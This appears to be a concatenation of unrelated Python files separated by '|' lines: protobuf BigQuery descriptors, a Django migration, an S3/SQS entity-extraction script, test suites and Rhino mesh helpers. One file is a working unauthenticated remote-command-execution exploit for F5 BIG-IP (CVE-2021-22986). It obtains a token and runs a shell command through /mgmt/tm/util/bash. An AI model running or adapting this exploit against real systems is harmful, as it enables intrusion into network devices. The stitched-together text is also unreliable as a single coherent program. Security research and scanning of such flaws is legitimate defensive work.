# @@protoc_insertion_point(class_scope:google.cloud.bigquery.v2.ListModelsResponse)
),
)
_sym_db.RegisterMessage(ListModelsResponse)
DESCRIPTOR._options = None
_MODEL_TRAININGRUN_TRAININGOPTIONS_LABELCLASSWEIGHTSENTRY._options = None
_MODEL_LABELSENTRY._options = None
_MODELSERVICE = _descriptor.ServiceDescriptor(
name="ModelService",
full_name="google.cloud.bigquery.v2.ModelService",
file=DESCRIPTOR,
index=0,
serialized_options=_b(
"\312A\027bigquery.googleapis.com\322A\220\001https://www.googleapis.com/auth/bigquery,https://www.googleapis.com/auth/cloud-platform,https://www.googleapis.com/auth/cloud-platform.read-only"
),
serialized_start=6543,
serialized_end=7112,
methods=[
_descriptor.MethodDescriptor(
name="GetModel",
full_name="google.cloud.bigquery.v2.ModelService.GetModel",
index=0,
containing_service=None,
input_type=_GETMODELREQUEST,
output_type=_MODEL,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name="ListModels",
full_name="google.cloud.bigquery.v2.ModelService.ListModels",
index=1,
containing_service=None,
input_type=_LISTMODELSREQUEST,
output_type=_LISTMODELSRESPONSE,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name="PatchModel",
full_name="google.cloud.bigquery.v2.ModelService.PatchModel",
index=2,
containing_service=None,
input_type=_PATCHMODELREQUEST,
output_type=_MODEL,
serialized_options=None,
),
_descriptor.MethodDescriptor(
name="DeleteModel",
full_name="google.cloud.bigquery.v2.ModelService.DeleteModel",
index=3,
containing_service=None,
input_type=_DELETEMODELREQUEST,
output_type=google_dot_protobuf_dot_empty__pb2._EMPTY,
serialized_options=None,
),
],
)
_sym_db.RegisterServiceDescriptor(_MODELSERVICE)
DESCRIPTOR.services_by_name["ModelService"] = _MODELSERVICE
# @@protoc_insertion_point(module_scope)
|
# encoding: utf-8
import os
from batman.input_output import formater
from tests.plugins import f_snapshot
coupling = 'coupling-dir'
input_formater = formater('json')
output_formater = formater('csv')
point = input_formater.read(os.path.join(coupling, 'sample-space.json'), ['X1', 'X2'])
result = f_snapshot(point)
output_formater.write(os.path.join(coupling, 'sample-data.csv'), result,
['F1', 'F2', 'F3'], [1, 1, 2])
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Activador',
fields=[
('id_esta', models.BigIntegerField(serialize=False, primary_key=True)),
('descri', models.CharField(max_length=50)),
],
options={
'db_table': 'activador',
'managed': False,
},
),
migrations.CreateModel(
name='BuscadorCant',
fields=[
('id_bus', models.BigIntegerField(serialize=False, primary_key=True)),
('palabra', models.CharField(max_length=100)),
('fecha', models.IntegerField()),
('fecha_ver', models.DateTimeField()),
],
options={
'db_table': 'buscador_cant',
'managed': False,
},
),
migrations.CreateModel(
name='Categoria',
fields=[
('id', models.BigIntegerField(serialize=False, primary_key=True)),
('nombre_cat', models.CharField(max_length=180)),
('visitas', models.CharField(max_length=255)),
('online', models.CharField(max_length=2)),
],
options={
'db_table': 'categoria',
'managed': False,
},
),
migrations.CreateModel(
name='CCiudadanas',
fields=[
('id_cc', models.AutoField(serialize=False, primary_key=True)),
('nombre_cc', models.CharField(max_length=200)),
('copete_cc', models.CharField(max_length=200, null=True, blank=True)),
('texto_cc', models.TextField()),
('imagen_cc', models.CharField(max_length=255, null=True, blank=True)),
('online', models.CharField(max_length=2)),
('local_sugerido', models.CharField(max_length=200, null=True, blank=True)),
],
options={
'db_table': 'c_ciudadanas',
'managed': False,
},
),
migrations.CreateModel(
name='Contactenos',
fields=[
('id_contactos', models.AutoField(serialize=False, primary_key=True)),
('nombre_contacto', models.CharField(max_length=100)),
('apellido_contacto', models.CharField(max_length=200, null=True, blank=True)),
('direccion_contacto', models.CharField(max_length=255, null=True, blank=True)),
('ciudad_contacto', models.CharField(max_length=255, null=True, blank=True)),
('telefono_contacto', models.CharField(max_length=200, null=True, blank=True)),
('celular_contacto', models.CharField(max_length=200, null=True, blank=True)),
('mail_contacto', models.CharField(max_length=100)),
('contactarme_con', models.CharField(max_length=100)),
('texto_contacto', models.TextField()),
('fecha_contacto', models.DateTimeField()),
('respuesta', models.CharField(max_length=2)),
('texto_resp', models.TextField(null=True, blank=True)),
('fecha_resp', models.DateTimeField(null=True, blank=True)),
],
options={
'db_table': 'contactenos',
'managed': False,
},
),
migrations.CreateModel(
name='ContadorVisitas',
fields=[
('id_visitas', models.AutoField(serialize=False, primary_key=True)),
('ip_visitante', models.CharField(max_length=100)),
('mes_visita', models.CharField(max_length=100)),
('anio_visita', models.CharField(max_length=100)),
('visitas', models.CharField(max_length=255)),
],
options={
'db_table': 'contador_visitas',
'managed': False,
},
),
migrations.CreateModel(
name='DetalleTarjeta',
fields=[
('id_tarje', models.BigIntegerField(serialize=False, primary_key=True)),
('id_negocio', models.IntegerField()),
('estado', models.CharField(max_length=2)),
('id_nombre', models.IntegerField()),
],
options={
'db_table': 'detalle_tarjeta',
'managed': False,
},
),
migrations.CreateModel(
name='Links',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('nombre_link', models.CharField(max_length=200)),
('link', models.CharField(max_length=200)),
],
options={
'db_table': 'links',
'managed': False,
},
),
migrations.CreateModel(
name='Negocio',
fields=[
('id', models.BigIntegerField(serialize=False, primary_key=True)),
('destacado', models.CharField(max_length=2, null=True, blank=True)),
('destacar', models.CharField(max_length=2, null=True, blank=True)),
('sugerido', models.CharField(max_length=2, null=True, blank=True)),
('direccion', models.CharField(max_length=200)),
('latitud', models.CharField(max_length=100, null=True, blank=True)),
('longitud', models.CharField(max_length=100, null=True, blank=True)),
('nombre', models.CharField(max_length=150)),
('zona', models.CharField(max_length=100, null=True, blank=True)),
('localidad', models.CharField(max_length=100, null=True, blank=True)),
('creacion', models.DateTimeField()),
('modificacion', models.DateTimeField(null=True, blank=True)),
('usuario_id', models.IntegerField()),
('ubicacion', models.CharField(max_length=100, null=True, blank=True)),
('imagen', models.CharField(max_length=200, null=True, blank=True)),
('imagen1', models.CharField(max_length=255, null=True, blank=True)),
('imagen2', models.CharField(max_length=255, null=True, blank=True)),
('imagen3', models.CharField(max_length=255, null=True, blank=True)),
('categoria_id', models.IntegerField()),
('descripcion', models.CharField(max_length=255, null=True, blank=True)),
('descrip_larga', models.TextField()),
('hora_aper', models.CharField(max_length=20, null=True, blank=True)),
('hora_cierre', models.CharField(max_length=20, null=True, blank=True)),
('tarjeta_cre', models.CharField(max_length=25)),
('tarjeta_debi', models.CharField(max_length=25)),
('estacionamiento', models.CharField(max_length=2, null=True, blank=True)),
('telefono', models.CharField(max_length=40, null=True, blank=True)),
('barrio', models.CharField(max_length=80, null=True, blank=True)),
('mail', models.CharField(max_length=150, null=True, blank=True)),
('web', models.CharField(max_length=180, null=True, blank=True)),
('rs1', models.CharField(max_length=255, null=True, blank=True)),
('rs2', models.CharField(max_length=255, null=True, blank=True)),
('rs3', models.CharField(max_length=255, null=True, blank=True)),
('rs4', models.CharField(max_length=255, null=True, blank=True)),
('visitas', models.CharField(max_length=255)),
('online', models.CharField(max_length=2)),
('nuevo', models.CharField(max_length=2)),
],
options={
'db_table': 'negocio',
'managed': False,
},
),
migrations.CreateModel(
name='Noticias',
fields=[
('id_noticias', models.AutoField(serialize=False, primary_key=True)),
('titulo_noticia', models.CharField(max_length=100)),
('copete_noticia', models.CharField(max_length=200)),
('texto_noticia', models.TextField()),
('imagen_noticia', models.CharField(max_length=100, null=True, blank=True)),
('fecha_noticia', models.DateTimeField()),
('autor_noticia', models.CharField(max_length=100)),
('online', models.CharField(max_length=20)),
],
options={
'db_table': 'noticias',
'managed': False,
},
),
migrations.CreateModel(
name='Slide',
fields=[
('id_slide', models.AutoField(serialize=False, primary_key=True)),
('nombre_slide', models.CharField(max_length=200)),
('descrip_slide', models.CharField(max_length=255, null=True, blank=True)),
('imagen_slide', models.CharField(max_length=255)),
('online', models.CharField(max_length=2)),
],
options={
'db_table': 'slide',
'managed': False,
},
),
migrations.CreateModel(
name='Sugerencias',
fields=[
('id_sug', models.AutoField(serialize=False, primary_key=True)),
('titulo_sug', models.CharField(max_length=200)),
('descrip_sug', models.CharField(max_length=200, null=True, blank=True)),
('texto_sug', models.TextField()),
('imagen_sug', models.CharField(max_length=200, null=True, blank=True)),
('fecha_sug', models.DateTimeField(null=True, blank=True)),
('online', models.CharField(max_length=2)),
],
options={
'db_table': 'sugerencias',
'managed': False,
},
),
migrations.CreateModel(
name='Tarjeta',
fields=[
('id_ta', models.BigIntegerField(serialize=False, primary_key=True)),
('nombre', models.CharField(max_length=60)),
],
options={
'db_table': 'tarjeta',
'managed': False,
},
),
migrations.CreateModel(
name='TipoUsuario',
fields=[
('idtiusu', models.BigIntegerField(serialize=False, primary_key=True)),
('descri', models.CharField(max_length=20)),
],
options={
'db_table': 'tipo_usuario',
'managed': False,
},
),
migrations.CreateModel(
name='Usuario',
fields=[
('id', models.BigIntegerField(serialize=False, primary_key=True)),
('usuario', models.CharField(max_length=100)),
('nombre', models.CharField(max_length=100, null=True, blank=True)),
('apellido', models.CharField(max_length=100, null=True, blank=True)),
('pass_field', models.CharField(max_length=255, db_column=b'pass')),
('mail', models.CharField(max_length=100)),
('ingreso', models.DateTimeField()),
('modificado', models.DateTimeField(null=True, blank=True)),
('keyes', models.CharField(max_length=60, null=True, blank=True)),
('id_esta', models.IntegerField()),
('validado', models.IntegerField()),
('idtiusu', models.IntegerField()),
('avatar', models.CharField(max_length=100, null=True, blank=True)),
('usuario_semana', models.CharField(max_length=2, null=True, blank=True)),
],
options={
'db_table': 'usuario',
'managed': False,
},
),
migrations.CreateModel(
name='Usuarionegocio',
fields=[
('unid', models.BigIntegerField(serialize=False, primary_key=True)),
('negocio_id', models.IntegerField()),
('usuario_id', models.IntegerField()),
('usuario_fb', models.CharField(max_length=180, null=True, blank=True)),
('ip_usuario', models.CharField(max_length=100)),
('comentario', models.CharField(max_length=180, null=True, blank=True)),
('coment_estado', models.IntegerField(null=True, blank=True)),
('visitas_usu', models.IntegerField()),
('votos', models.IntegerField()),
('media', models.FloatField()),
('fecha_create', models.DateTimeField()),
],
options={
'db_table': 'usuarionegocio',
'managed': False,
},
),
migrations.CreateModel(
name='VotosUsuarios',
fields=[
('id', models.IntegerField(serialize=False, primary_key=True)),
('usuario_id', models.IntegerField()),
('ip_usuario', models.CharField(max_length=100)),
('fecha_voto', models.DateField()),
],
options={
'db_table': 'votos_usuarios',
'managed': False,
},
),
]
|
import json
import boto3
import click
from tqdm import tqdm
from nerd.poll_queue import get_texts_from_queue
from nerd.extract import extract_entities
@click.command()
@click.option(
"--source_queue_name",
prompt="Source queue name",
default="inference-entity-extraction",
help="name of the queue whose messages we want to process"
)
@click.option(
"--dest_bucket_name",
prompt="Destination bucket name",
default="wellcomecollection-inference-calm",
help="the name of the s3 bucket where we'll post results"
)
def process_queue(source_queue_name, dest_bucket_name):
"""
Pulls messages off a queue of calm VHS records, extracts the description
field from each record, and runs a Named Entity Recognition & Disambiguation
process on the text. The resulting list of subjects and entities is then
written to a specified s3 bucket alongside the source text.
"""
s3 = boto3.client("s3")
sqs = boto3.client("sqs")
queue_url = sqs.get_queue_url(QueueName=source_queue_name)["QueueUrl"]
queue_length = int(sqs.get_queue_attributes(
QueueUrl=queue_url,
AttributeNames=["ApproximateNumberOfMessages"]
)["Attributes"]["ApproximateNumberOfMessages"])
loop = tqdm(get_texts_from_queue(queue_url), total=queue_length)
for record_id, title, description in loop:
key = "inferred_data/" + record_id + ".json"
data_to_post = {
"title": {
"text": title,
"entities": extract_entities(title)
},
"description": {
"text": description,
"entities": extract_entities(description)
}
}
binary_data = json.dumps(data_to_post).encode("utf-8")
s3.put_object(
Body=binary_data,
Bucket=dest_bucket_name,
Key=key
)
if __name__ == "__main__":
process_queue()
|
frase = ('Curso em Video Python')
dividido = (frase.split())
print(dividido[2][3])
|
#Problem 1
#Compute the factorial (n!) of a number using recursion
import sys
def factorial(n):
if n ==1:
return 1
return n*factorial(n-1)
if __name__ == "__main__":
try:
n = int(input("Ingrese un numero: "))
print(factorial(n))
except Exception as e:
print(e)
sys.exit()
|
import os
import shutil
import unittest
import tests.helper as helper
import thingsvision.vision as vision
import numpy as np
class FeaturesTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
helper.create_test_images()
def setUp(self):
shutil.rmtree(helper.OUT_PATH)
os.makedirs(helper.OUT_PATH)
def get_2D_features(self):
model_name = 'vgg16_bn'
model, dataset, dl = helper.create_model_and_dl(model_name, 'pt')
module_name ='classifier.3'
features, _ = model.extract_features(
data_loader=dl,
module_name=module_name,
batch_size=helper.BATCH_SIZE,
flatten_acts=False
)
return features
def get_4D_features(self):
model_name = 'vgg16_bn'
model, dataset, dl = helper.create_model_and_dl(model_name, 'pt')
module_name ='features.23'
features, _ = model.extract_features(
data_loader=dl,
module_name=module_name,
batch_size=helper.BATCH_SIZE,
flatten_acts=False
)
return features
def test_postprocessing(self):
"""Test different postprocessing methods (e.g., centering, normalization, compression)."""
features = self.get_2D_features()
flattened_features = features.reshape(helper.NUM_SAMPLES, -1)
centred_features = vision.center_features(flattened_features)
normalized_features = vision.normalize_features(flattened_features)
transformed_features = vision.compress_features(
flattened_features, rnd_seed=42, retained_var=.9)
self.assertTrue(centred_features.mean(axis=0).sum() < 1e-3)
self.assertEqual(np.linalg.norm(normalized_features, axis=1).sum(),
np.ones(features.shape[0]).sum())
self.assertTrue(
transformed_features.shape[1] < flattened_features.shape[1])
def check_file_exists(self, file_name, format, txt_should_exists=True):
if format == 'hdf5':
format = 'h5'
file_name = 'features'
path = os.path.join(helper.OUT_PATH, f'{file_name}.{format}')
if format == 'txt' and not txt_should_exists:
self.assertTrue(not os.path.exists(path))
else:
self.assertTrue(os.path.exists(path))
def test_storing_2d(self):
"""Test storing possibilities."""
features = self.get_2D_features()
for format in helper.FILE_FORMATS:
# tests whether features can be saved in any of the formats as two-dimensional tensor
vision.save_features(
features=features,
out_path=helper.OUT_PATH,
file_format=format,
)
self.check_file_exists('features', format)
def test_storing_4d(self):
features = self.get_4D_features()
for format in helper.FILE_FORMATS:
# tests whether features can be saved in any of the formats as four-dimensional tensor
vision.save_features(
features=features,
out_path=helper.OUT_PATH,
file_format=format,
)
self.check_file_exists('features', format, False)
def test_splitting_2d(self):
n_splits = 3
features = self.get_2D_features()
for format in helper.FILE_FORMATS:
vision.split_features(
features=features,
PATH=helper.OUT_PATH,
file_format=format,
n_splits=n_splits
)
for i in range(1, n_splits):
self.check_file_exists(f'features_0{i}', format)
def test_splitting_4d(self):
n_splits = 3
features = self.get_4D_features()
for format in set(helper.FILE_FORMATS) - set(['txt']):
vision.split_features(
features=features,
PATH=helper.OUT_PATH,
file_format=format,
n_splits=n_splits
)
for i in range(1, n_splits):
self.check_file_exists(f'features_0{i}', format, False)
with self.assertRaises(Exception):
vision.split_features(
features=features,
PATH=helper.OUT_PATH,
file_format='txt',
n_splits=n_splits
)
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''F5 BIG-IP iControl REST unauthenticated RCE''',
"description": '''The iControl REST interface has an unauthenticated remote command execution vulnerability.''',
"severity": "critical",
"references": [
"https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986",
"https://support.f5.com/csp/article/K03009991"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2021-22986",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["bigip", "cve", "cve2021", "rce", "mirai"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/mgmt/shared/authn/login"""
method = "POST"
data = {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
headers = {'Accept-Language': 'en', 'Authorization': 'Basic YWRtaW46', 'Content-Type': 'application/json', 'Cookie': 'BIGIPAuthCookie=1234', 'Connection': 'close'}
resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/mgmt/tm/util/bash"""
method = "POST"
data = {"command":"run","utilCmdArgs":"-c id"}
headers = {'Accept-Language': 'en', 'X-F5-Auth-Token': '§token§', 'Content-Type': 'application/json', 'Connection': 'close'}
resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""commandResult""" in resp1.text and """uid=""" in resp1.text):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
|
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the reproman package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Facility for managing compute resources.
"""
__docformat__ = 'restructuredtext'
from .base import Resource, ResourceManager
_MANAGER = None
def get_manager():
"""Return a ResourceManager instance.
A new instance is not created if one already exists. This getter function
is used rather than a module-level instance to support delaying instance
creation.
"""
global _MANAGER
if _MANAGER is None:
_MANAGER = ResourceManager()
return _MANAGER
|
from graphite_feeder.handler.event.enum.alarm import armed
from graphite_feeder.handler.event.enum.alarm import triggered
|
# PYTHON STANDARD LIBRARY IMPORTS ---------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import deque
import itertools
from os import path
# LOCAL MODULE IMPORTS --------------------------------------------------------
from ghautoknit import Structs
from ghautoknit.Constraint import Constraint
# RHINO IMPORTS ---------------------------------------------------------------
from Rhino.Geometry import Mesh as RhinoMesh
from Rhino.Geometry import Point3f as RhinoPoint3f
# ALL LIST --------------------------------------------------------------------
__all__ = [
"LoadConstraints",
"SaveConstraints",
"InterpretStoredConstraints",
"LoadObj",
"SaveObj"
]
# READ AND WRITE FUNCTIONS (PRIVATE) ------------------------------------------
# SCALARS ---------------------------------------------------------------------
def _read_scalar(instream, name):
"""Reads a scalar from the stream and returns it as an integer."""
try:
s = instream.read(Structs.STRUCT_SCALAR.size)
scalar = Structs.STRUCT_SCALAR.unpack(s)[0]
return scalar
except Exception as e:
raise RuntimeError("Failed to read scalar " +
"{} // {}".format(name, str(e)))
def _write_scalar(outstream, scalar, name):
"""Writes a scalar to the output stream."""
try:
s = Structs.STRUCT_SCALAR.pack(scalar)
outstream.write(s)
return True
except Exception as e:
raise RuntimeError("Failed to write scalar " +
"{} // {}".format(name, e))
# VECTORS ---------------------------------------------------------------------
def _read_vector(instream, structure, name):
"""Reads a vector from the instream and returns it as a tuple."""
try:
v = instream.read(structure.size)
vector = structure.unpack(v)
return vector
except Exception as e:
raise RuntimeError("Failed to read vector " +
"{} // {}".format(name, str(e)))
def _write_vector(outstream, vector, structure, name):
"""Writes a vector to the output stream."""
try:
v = structure.pack(*vector)
outstream.write(v)
return True
except Exception as e:
raise RuntimeError("Failed to write vector " +
"{} // {}".format(name, e))
# VECTOR SEQUENCES ------------------------------------------------------------
def _read_vector_sequence(instream, structure, name):
"""
Reads a sequence of vectors from the stream using the given structure.
"""
try:
count = _read_scalar(instream, name + " count")
vectors = [_read_vector(instream,
structure,
name + " {}".format(i)) for i in range(count)]
return vectors
except Exception as e:
raise RuntimeError("Failed to read vector sequence " +
"{} // {}".format(name, str(e)))
def _write_vector_sequence(outstream, sequence, structure, name):
"""Writes a sequence of vectors to the stream using the given structure."""
try:
count = len(sequence)
_write_scalar(outstream, count, name + " count")
for i, v in enumerate(sequence):
_write_vector(outstream, v, structure, name + " {}".format(str(i)))
return True
except Exception as e:
raise RuntimeError("Failed to write vector sequence " +
"{} // {}".format(name, str(e)))
# LOADING AND SAVING OF CONSTRAINTS (PUBLIC) ----------------------------------
def LoadConstraints(filepath):
"""Loads autoknit constraints from a binary *.cons file."""
with open(filepath, "rb") as f:
try:
vertices = _read_vector_sequence(f,
Structs.STRUCT_VERTEX,
"vertices")
constraints = _read_vector_sequence(
f,
Structs.STRUCT_STOREDCONSTRAINT,
"constraints")
return True, vertices, constraints
except Exception as e:
print(e)
return False, e
def SaveConstraints(filepath, vertices, constraints):
"""Saves constraints to a binary *.cons file compatible with autoknit."""
try:
with open(filepath, "wb") as f:
vertices = list(itertools.chain.from_iterable(vertices))
_write_vector_sequence(f,
vertices,
Structs.STRUCT_VERTEX,
"vertices")
constraints = [c.Storable for c in constraints]
_write_vector_sequence(f,
constraints,
Structs.STRUCT_STOREDCONSTRAINT,
"constraints")
except Exception as e:
print(e)
raise RuntimeError("Could not write constraints file!")
# INTERPRETATION OF SAVED CONSTRAINTS -----------------------------------------
def InterpretStoredConstraints(points, storedconstraints):
"""Interprets the results of loading a *.cons file and builds
Autoknit Constraints from them."""
points = deque(points)
constraints = []
for i, c in enumerate(storedconstraints):
vertices = [points.popleft() for x in range(c.Count)]
constraints.append(Constraint(i, vertices, c.Value, c.Radius))
return constraints
# LOADING AND SAVING OF MODELS (OBJ FILES) ------------------------------------
def LoadObj(filepath):
"""Reads from an *.obj file and returns a mesh"""
# create a new, empty Rhino mesh
model = RhinoMesh()
# read from the file in text mode
with open(filepath, "rt") as f:
while True:
#scriptcontext.escape_test()
# read a line and split it into parts
line = f.readline()
if not line:
break
# split the line into parts
parts = str.split(line, " ")
token = parts[0]
data = parts[1:]
# catch empty line as delimiter
if not parts or parts == [""]:
continue
# catch vertices
elif token == "v":
# add vertex
vx, vy, vz = [float(c) for c in data]
vertex = RhinoPoint3f(vx, vy, vz)
model.Vertices.Add(vertex)
# catch faces
elif token == "f":
# add face
if len(data) == 3:
# implementation detail: Rhino vertex indices are 0-based
va, vb, vc = [int(i)-1 for i in data]
model.Faces.AddFace(va, vb, vc)
elif len(data) == 4:
# implementation detail: Rhino vertex indices are 0-based
va, vb, vc, vd = [int(i)-1 for i in data]
model.Faces.AddFace(va, vb, vc, vd)
return model
def SaveObj(filepath, mesh):
"""Saves a Rhino mesh as an *.obj file."""
# run some checks on the input
if not mesh or type(mesh) is not RhinoMesh:
raise ValueError("Supplied mesh is not a valid Rhino mesh!")
if not filepath or type(filepath) is not str:
raise ValueError("Supplied filepath is not a valid filepath!")
# remove trailing newlines from the filepath and check for file extension
filepath = path.normpath(filepath.rstrip("\n\r"))
if not filepath.lower().endswith(".obj"):
filepath = filepath + ".obj"
# extract vertex coordinates from the mesh and build strings
mv = list(mesh.Vertices.ToPoint3dArray())
vertices = ["v {} {} {}\n".format(v.X, v.Y, v.Z) for v in mv]
# extract faces from the mesh and build obj strings
fids = deque(mesh.Faces.ToIntArray(False))
temp = deque()
faces = deque()
while len(fids) > 0:
# scriptcontext.escape_test()
# if face is complete, check if it is a triangle, append and reset temp
if temp and len(temp) == 4:
if temp[-2] == temp[-1]:
temp.pop()
faces.append(("f" + (" {}" * len(temp)) + "\n").format(*temp))
temp.clear()
else:
# standard procedure - just add index to temp
temp.append(fids.popleft() + 1)
else:
# handle trailing face at the end
if len(temp) > 0:
if len(temp) == 4 and temp[-2] == temp[-1]:
temp.pop()
faces.append(("f" + (" {}" * len(temp)) + "\n").format(*temp))
temp.clear()
# open the file and write all the collected data to it
with open(filepath, "wt") as f:
# write the header to the file
f.write("# Rhino Grasshopper OBJ exporter by Max Eschenbach\n")
f.write("\n")
f.write("# Mesh Vertices\n")
f.writelines(vertices)
f.write("\n")
f.write("# Mesh Faces\n")
f.writelines(faces)
# MAIN ------------------------------------------------------------------------
if __name__ == '__main__':
pass
|
import os
import sys
original = sys.stdout
original.flush()
unbuffered = os.fdopen(original.fileno(), 'w', 0)
sys.stdout = unbuffered
|
from ontobio.io import assocparser
from ontobio.io.gpadparser import GpadParser
from ontobio.io import gafparser
from ontobio.io.gafparser import GafParser
from ontobio.io import GafWriter
from ontobio.io.assocwriter import GpadWriter
from ontobio.assoc_factory import AssociationSetFactory
from ontobio.ontol_factory import OntologyFactory
from ontobio.model import association
from ontobio.rdfgen import relations
from ontobio.ecomap import EcoMap
ecomap = EcoMap()
ecomap.mappings()
import tempfile
import logging
import pytest
import io
import json
POMBASE = "tests/resources/truncated-pombase.gaf"
POMBASE_GPAD = "tests/resources/truncated-pombase.gpad"
ONT = "tests/resources/go-truncated-pombase.json"
QGAF = "tests/resources/test-qualifiers.gaf"
def test_skim_gaf():
p = GafParser()
p.config.ecomap = EcoMap()
results = p.skim(open(POMBASE, "r"))
assert len(results) == 370
for r in results:
print(str(r))
(s, sn, o) = r
assert o.startswith('GO:')
assert s.startswith('PomBase:')
def test_skim_gaf_qualifiers():
p = GafParser()
p.config.ecomap = EcoMap()
p.config.remove_double_prefixes = True
results = p.skim(open(QGAF, "r"))
for r in results:
print(str(r))
(s, sn, o) = r
assert o.startswith('GO:')
assert s.startswith('MGI:') or s.startswith('PomBase')
assert len(results) == 5 # ensure NOTs are skipped
p.config.exclude_relations = ['contributes_to', 'colocalizes_with']
results = p.skim(open(QGAF, "r"))
for r in results:
(s, sn, o) = r
assert o.startswith('GO:')
assert s.startswith('MGI:') or s.startswith('PomBase')
assert len(results) == 3 # ensure NOTs and excludes relations skipped
def test_one_line():
p = GafParser(config=assocparser.AssocParserConfig(
ontology=OntologyFactory().create("tests/resources/goslim_generic.json")))
parsed = p.parse_line("PomBase SPBC16D10.09 pcn1 GO:0009536 PMID:8663159 IDA C PCNA pcn protein taxon:4896 20150326 PomBase")
def test_skim_gpad():
p = GpadParser()
p.config.ecomap = EcoMap()
results = p.skim(open(POMBASE_GPAD, "r"))
assert len(results) == 1984
for r in results:
print(str(r))
(s, sn, o) = r
assert o.startswith('GO:')
assert s.startswith('PomBase:') or s.startswith('PR:')
def test_parse_gaf():
parse_with(POMBASE, GafParser())
def test_parse_gpad():
parse_with(POMBASE_GPAD, GpadParser())
def parse_with(f, p):
p.config.ecomap = EcoMap()
is_gaf = f == POMBASE
ont = OntologyFactory().create(ONT)
if is_gaf:
# only do ontology checking on GAF parse;
# this is because ontology is made from GAF
p.config.ontology = ont
else:
p.config.ontology = None
results = p.parse(open(f, "r"), skipheader=True)
print(p.report.to_markdown())
r1 = results[0]
# TODO: test datafile does not have ECOs yet!!
assert ecomap.ecoclass_to_coderef(str(r1.evidence.type))[0] == 'ISO' or str(r1.evidence.type) == 'ECO:0000201'
assert r1.evidence.with_support_from == [association.ConjunctiveSet([association.Curie.from_str('SGD:S000001583')])]
assert r1.evidence.has_supporting_reference == [association.Curie.from_str('GO_REF:0000024')]
if is_gaf:
assert r1.subject.label == 'ypf1'
assert association.ymd_str(r1.date, "") == '20150305'
for r in results:
#print(str(r))
sid = r.subject.id
prov = r.provided_by
assert prov == 'PomBase' or prov == 'UniProt'
assert r.object.id.namespace == "GO"
assert sid.namespace == 'PomBase' or (not is_gaf and sid.namespace == 'PR')
if is_gaf:
assert str(r.subject.taxon) =='NCBITaxon:4896'
# for m in p.report.messages:
# print("MESSAGE: {}".format(m))
print("MESSAGES (sample): {}".format(p.report.messages[0:5]))
# Messages that aren't about upgrading qualifiers in rule 59 should be 0
assert len([msg for msg in p.report.messages if msg["rule"] != 59]) == 0
# print(p.report.to_markdown())
def test_flag_invalid_id():
ont = OntologyFactory().create(ONT)
p = GafParser()
p.config.ontology = ont
p._validate_ontology_class_id("FAKE:1", assocparser.SplitLine("fake", [""]*17, taxon="foo"))
assert len(p.report.messages) == 1
def test_no_flag_valid_id():
ont = OntologyFactory().create(ONT)
p = GafParser()
p.config.ontology = ont
p._validate_ontology_class_id("GO:0000785", assocparser.SplitLine("fake", [""]*17, taxon="foo"))
assert len(p.report.messages) == 0
def test_convert_gaf_to_gpad():
p = GafParser()
p.config.ecomap = EcoMap()
w = GpadWriter()
p2 = GpadParser()
convert(POMBASE, p, w, p2)
def convert(file, p, w, p2):
assocs = p.parse(file, skipheader=True)
outfile = tempfile.NamedTemporaryFile(mode='w', delete=False)
w.file = outfile
for a in assocs:
w.write_assoc(a)
outfile.close()
assocs2 = p2.parse(outfile.name)
for a in assocs2:
print("REPARSED: {}".format(a))
assert len(assocs) == len(assocs2)
def test_invalid_goid_in_gpad():
# Note: this ontology is a subset of GO extracted using the GAF, not GPAD
p = GpadParser()
p.config.ontology = OntologyFactory().create(ONT)
results = p.parse(open(POMBASE_GPAD, "r"), skipheader=True)
# we expect errors since ONT is not tuned for the GPAD file
# for m in p.report.messages:
# print("MESSAGE: {}".format(m))
assert len(p.report.messages) > 500
print(p.report.to_markdown())
def test_validate_go_idspaces():
ont = OntologyFactory().create(ONT)
p = GafParser()
p.config.class_idspaces = ['FOOZ']
assocs = p.parse(open(POMBASE, "r"), skipheader=True)
for m in p.report.messages:
print("MESSAGE: {}".format(m))
assert len(assocs) == 0
assert len(p.report.messages) > 1
summary = p.report.to_report_json()
assert summary['associations'] == 0
assert summary['lines'] > 300
print(p.report.to_markdown())
# ensure config is not preserved
p = GafParser()
assert p.config.class_idspaces == None
#POMBASE_GPAD = "tests/resources/truncated-pombase.gpad"
def test_qualifiers_gaf():
# ont = OntologyFactory().create(ONT)
p = GafParser()
# p.config.ontology = ont
assocs = p.parse(open(QGAF, "r"), skipheader=True)
neg_assocs = [a for a in assocs if a.negated == True]
assert len(neg_assocs) == 3
for a in assocs:
print('REL: {}'.format(str(a.relation)))
assert len([a for a in assocs if str(a.relation) == 'RO:0002326']) == 1
# For the space in `colocalizes with`
assert len(list(filter(lambda e: e["obj"] == "colocalizes with", p.report.to_report_json()["messages"]["gorule-0000001"]))) == 1
